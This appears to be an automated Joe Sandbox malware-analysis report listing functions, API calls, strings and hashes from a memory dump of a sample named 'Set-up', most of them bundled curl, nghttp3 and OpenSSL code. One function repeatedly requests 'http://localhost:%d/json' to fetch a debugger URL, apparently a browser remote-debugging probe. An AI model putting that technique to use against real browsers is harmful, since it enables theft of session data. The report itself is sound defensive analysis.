Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
API String ID: 3302935713-3407012168
Opcode ID: 32cf3a07c60ca8219b3fb189f47135a2fddcc601b5d58ad788bb3b944b5369b3
Instruction ID: 3e37faa2901f83c9ebe59c146e1e161b7a6b71ebd485c26762f05742d10bdbb6
Opcode Fuzzy Hash: 32cf3a07c60ca8219b3fb189f47135a2fddcc601b5d58ad788bb3b944b5369b3
Instruction Fuzzy Hash: 60E143B1A00305ABD7559B24DC85B7BB7E8EF84710F08852DFA5897292E774EE04CB93

Function 00D2A140 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 341COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 00D2A29A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 00D2A2C5
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 00D2A2E3

Part of subcall function 00D2A5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 00D2A5FC

Strings

rblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 00D2A551
rblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 00D2A512
i > 0, xrefs: 00D2A4E8, 00D2A590
lblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 00D2A566
i < blk->n - 1, xrefs: 00D2A4FD
lblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 00D2A527
n > 0, xrefs: 00D2A53C, 00D2A57B
node->blk->n == NGHTTP3_KSL_MIN_NBLK, xrefs: 00D2A4D3
nghttp3_ksl.c, xrefs: 00D2A4CE, 00D2A4E3, 00D2A4F8, 00D2A50D, 00D2A522, 00D2A537, 00D2A54C, 00D2A561, 00D2A576, 00D2A58B

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpy$memmove
String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
API String ID: 1283327689-1606465060
Opcode ID: f158f2050abacf31d6ec9afe2ea8db3b24c7dda7370d3f2e1ea3a2989a76d636
Instruction ID: a04b3e1f6c552c5bd0e1c38ebbeca5385baa05f63fea093b3e4901ac8bdd8c16
Opcode Fuzzy Hash: f158f2050abacf31d6ec9afe2ea8db3b24c7dda7370d3f2e1ea3a2989a76d636
Instruction Fuzzy Hash: C2C11271A003119FC714DF0CD8C596AB7E9FFA8318F58852DE9498B285D770ED85CBA2

Function 00CF27E0 Relevance: 35.4, APIs: 4, Strings: 16, Instructions: 406stringnetworkCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CF2AD7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CF2B3D
sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00CF2D30
WSAGetLastError.WS2_32 ref: 00CF2D3A

Strings

tftp_send_first: internal error, xrefs: 00CF295C
Internal state machine error, xrefs: 00CF28C5
tftp.c, xrefs: 00CF2B03, 00CF2C6E, 00CF2D62
octet, xrefs: 00CF280B
Connected for transmit, xrefs: 00CF29E0, 00CF2A34
0, xrefs: 00CF2B94
netascii, xrefs: 00CF2810, 00CF2B23
Connected for receive, xrefs: 00CF290B, 00CF298A
tsize, xrefs: 00CF2BAD
TFTP filename too long, xrefs: 00CF2AF5
%s%c%s%c, xrefs: 00CF2B2A
TFTP buffer too small for options, xrefs: 00CF2C60
timeout, xrefs: 00CF2CD3
%lld, xrefs: 00CF2B82
TFTP finished, xrefs: 00CF289C
blksize, xrefs: 00CF2C33

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen$ErrorLastsendto
String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
API String ID: 3285375004-3063461439
Opcode ID: 853621b466972ae1f832e6e12aaed605ac21622e153c00f344ef8bb7cf9351e8
Instruction ID: ccdcd2f0cdabaaa118adb5e9edad99637cc77406aa7f7425c08d1b3490c6f0ac
Opcode Fuzzy Hash: 853621b466972ae1f832e6e12aaed605ac21622e153c00f344ef8bb7cf9351e8
Instruction Fuzzy Hash: 34E12631A00304ABD765AB24DC86F7B77A4AF50708F09856CFE189B293E772ED14D792

Function 00CA4720 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 426stringCOMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00CA4749
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 00CA48E5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 00CA491B
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA4963
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00CA4971
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA497B

Part of subcall function 00CA06F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00CA5663,?), ref: 00CA06F9

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA4A41
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00CA4A63
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA4A6D
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00CA4AE0
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA4AEA
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00CA4B28
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA4B34
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00CA4B76
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA4B80

Strings

%ld, xrefs: 00CA49BC
urlapi.c, xrefs: 00CA47B9, 00CA47CC, 00CA47E2, 00CA482C, 00CA4856, 00CA4879, 00CA49A6
%u.%u.%u.%u, xrefs: 00CA4C00

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _errno$strtoul$strchr$memchrstrlen
String ID: %ld$%u.%u.%u.%u$urlapi.c
API String ID: 102816355-2423153182
Opcode ID: 7c4f015fc2a54d036277c99b73d77b675ddb30cd374af8345508e83b699b4c51
Instruction ID: bd6118fe676fa7855f2f7867fb29aa568663eae83a40dfb3706fdcfb73ed42b5
Opcode Fuzzy Hash: 7c4f015fc2a54d036277c99b73d77b675ddb30cd374af8345508e83b699b4c51
Instruction Fuzzy Hash: E0D15AB19043026BE718AA25DC46B7B7BD89F92318F05443CF89987282F7B8DE14D792

Function 00CFC350 Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 166stringnetworkCOMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 00CFC37A
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 00CFC476
WSAGetLastError.WS2_32 ref: 00CFC4AE

Strings

No error, xrefs: 00CFC463
r, xrefs: 00CFC561
SSL certificate verification failed, xrefs: 00CFC582
unknown, xrefs: 00CFC374
SSL certificate problem: %s, xrefs: 00CFC420
own , xrefs: 00CFC570
erro, xrefs: 00CFC568
SSL_ERROR unknown, xrefs: 00CFC502, 00CFC524
SSL_ERROR_SYSCALL, xrefs: 00CFC4F5
Unknown error, xrefs: 00CFC468, 00CFC474
QUIC connection has been shut down, xrefs: 00CFC3D1
Unkn, xrefs: 00CFC578
QUIC connect: %s in connection to %s:%d (%s), xrefs: 00CFC525

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ErrorLastmemcpystrcpy
String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
API String ID: 31095072-3036451936
Opcode ID: cb869ed83186e6246e1e74b22c2e0b67470068ffbe87f5bc82f095f29e5e2256
Instruction ID: a4949a87ead4833b5e95d1ad51d88bea8ce117bb403c721e8e1ec4205ddc438a
Opcode Fuzzy Hash: cb869ed83186e6246e1e74b22c2e0b67470068ffbe87f5bc82f095f29e5e2256
Instruction Fuzzy Hash: 2351AB71A0834C5FD710AB61DC81BBFBB90DF91304F14892DFA989B282E675E944CB83

Function 00F0E990 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 242COMMON

Download Yara Rule

APIs

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00F0EA90
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 00F0EAD9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00F0EB98

Strings

calling stat(%s), xrefs: 00F0EB25
file_open_stream, xrefs: 00F0EC9B
file_open, xrefs: 00F0EA2D, 00F0EB07, 00F0EBFF
file:, xrefs: 00F0E9B2
Given path=%s, xrefs: 00F0EC17
file_open_dir, xrefs: 00F0EBC0, 00F0EC6C
providers/implementations/storemgmt/file_store.c, xrefs: 00F0EA37, 00F0EB11, 00F0EBCA, 00F0EC09, 00F0EC76, 00F0ECA5
Calling OPENSSL_DIR_read("%s"), xrefs: 00F0EBD8
localhost/, xrefs: 00F0E9FD

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _errno_stat64tolower
String ID: Calling OPENSSL_DIR_read("%s")$Given path=%s$calling stat(%s)$file:$file_open$file_open_dir$file_open_stream$localhost/$providers/implementations/storemgmt/file_store.c
API String ID: 3401003986-2019258128
Opcode ID: 33fbc544be4deff371fd5a399e524dbd332222169384afb972c77e003acce948
Instruction ID: 9857e0e1d8eee1a7309e2739d7ff467ec0ee2e48675f16ac35df96177ab6ab7a
Opcode Fuzzy Hash: 33fbc544be4deff371fd5a399e524dbd332222169384afb972c77e003acce948
Instruction Fuzzy Hash: 017107B5F44300ABE7207B20AC47F2A7BD5AF05724F484C29F985662C3EAB5E504F792

Function 00CE25D0 Relevance: 19.8, APIs: 1, Strings: 12, Instructions: 295COMMON

Download Yara Rule

Strings

LOGINDISABLED, xrefs: 00CE2867
STARTTLS not available., xrefs: 00CE3094
PREAUTH connection, already authenticated, xrefs: 00CE2770
STARTTLS, xrefs: 00CE2D47
STARTTLS denied, xrefs: 00CE3068
TTLS, xrefs: 00CE2846
CAPABILITY, xrefs: 00CE2797
L-IR, xrefs: 00CE289C
STAR, xrefs: 00CE283C
Got unexpected imap-server response, xrefs: 00CE3034
SASL, xrefs: 00CE2892
AUTH, xrefs: 00CE28C5

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
API String ID: 0-3171374047
Opcode ID: e1b49248dfc7010e174ca0ec623a4fe7adad2ae32069fcdd0a38d362154c6a85
Instruction ID: 578815f49d5a473db98ab38da92466350b94eb47bf3933f837784f0461649c7e
Opcode Fuzzy Hash: e1b49248dfc7010e174ca0ec623a4fe7adad2ae32069fcdd0a38d362154c6a85
Instruction Fuzzy Hash: 5BB16D71A043C09BDB229B27C885B7A77ACBF55704F18027DF8A947282E775AF40D792

Function 00C820AD Relevance: 19.6, APIs: 3, Strings: 10, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C820D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00C822D0

Strings

http://localhost:%d/json, xrefs: 00C82170
GET request succeeded on attempt %d., xrefs: 00C8225D
Failed to initialize curl., xrefs: 00C8213F
@, xrefs: 00C821F2
All %d attempts to fetch debugger URL failed., xrefs: 00C822EF
Failed to allocate memory for response., xrefs: 00C820F1
Q, xrefs: 00C82213
+N, xrefs: 00C821B1
d, xrefs: 00C82178
Attempt %d failed: %s, xrefs: 00C8229F

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: freemalloc
String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
API String ID: 3061335427-1249806554
Opcode ID: 73fe3a34673941e80fdd68a66f77ac80bf217415bd5a3898922828a4b5b19d28
Instruction ID: 8983c2c0dabce4d30ead7d8d979183a864dea9559c2c374355e6bfb6f2a1fef6
Opcode Fuzzy Hash: 73fe3a34673941e80fdd68a66f77ac80bf217415bd5a3898922828a4b5b19d28
Instruction Fuzzy Hash: 806193B49087099FDB00EFA8D48979EBBF4FF44318F11881DE988A7341D77899849F96

Function 00D24920 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 162COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00D2499C
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!conn->server,nghttp3_conn.c,00000A08), ref: 00D24A0A
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A2B,?), ref: 00D24A8E
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,00000A2C), ref: 00D24AA3
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->inc == 0 || pri->inc == 1,nghttp3_conn.c,00000A2D), ref: 00D24AB8
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A3E,?), ref: 00D24B1A

Strings

pri->urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00D24A9E
!conn->server, xrefs: 00D24A05
pri->inc == 0 || pri->inc == 1, xrefs: 00D24AB3
conn->server, xrefs: 00D24A89, 00D24B15
nghttp3_conn.c, xrefs: 00D24A00, 00D24A84, 00D24A99, 00D24AAE, 00D24B10

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert$memcpy
String ID: !conn->server$conn->server$nghttp3_conn.c$pri->inc == 0 || pri->inc == 1$pri->urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 3718630003-1169204258
Opcode ID: 70ce223e36d4a96f3959106cbc75438a5b0fd8f174fe575c9c173fdea84f8b7c
Instruction ID: 6d657ca1348ce3a2d08f66c161fbd00a1ab738d8077b2ef4f56b1ca0c638cd25
Opcode Fuzzy Hash: 70ce223e36d4a96f3959106cbc75438a5b0fd8f174fe575c9c173fdea84f8b7c
Instruction Fuzzy Hash: C2511571A54325ABD720DE28BC01BAB77E9EFA931CF18452DFD9486181D770E980C7B2

Function 00E34580 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00CF8C0E,?), ref: 00E345E3
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00CF8C0E,?), ref: 00E3460A

Strings

ENGINE_by_id, xrefs: 00E346D5, 00E346FA, 00E34746
dynamic, xrefs: 00E34604, 00E34633
LOAD, xrefs: 00E346BA
LIST_ADD, xrefs: 00E346A0
id=%s, xrefs: 00E3475E
/data/curl-i686/lib/engines-3, xrefs: 00E3462B, 00E34682
DIR_ADD, xrefs: 00E34683
OPENSSL_ENGINES, xrefs: 00E3461C
crypto/engine/eng_list.c, xrefs: 00E346DF, 00E34704, 00E34750
DIR_LOAD, xrefs: 00E3466A

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
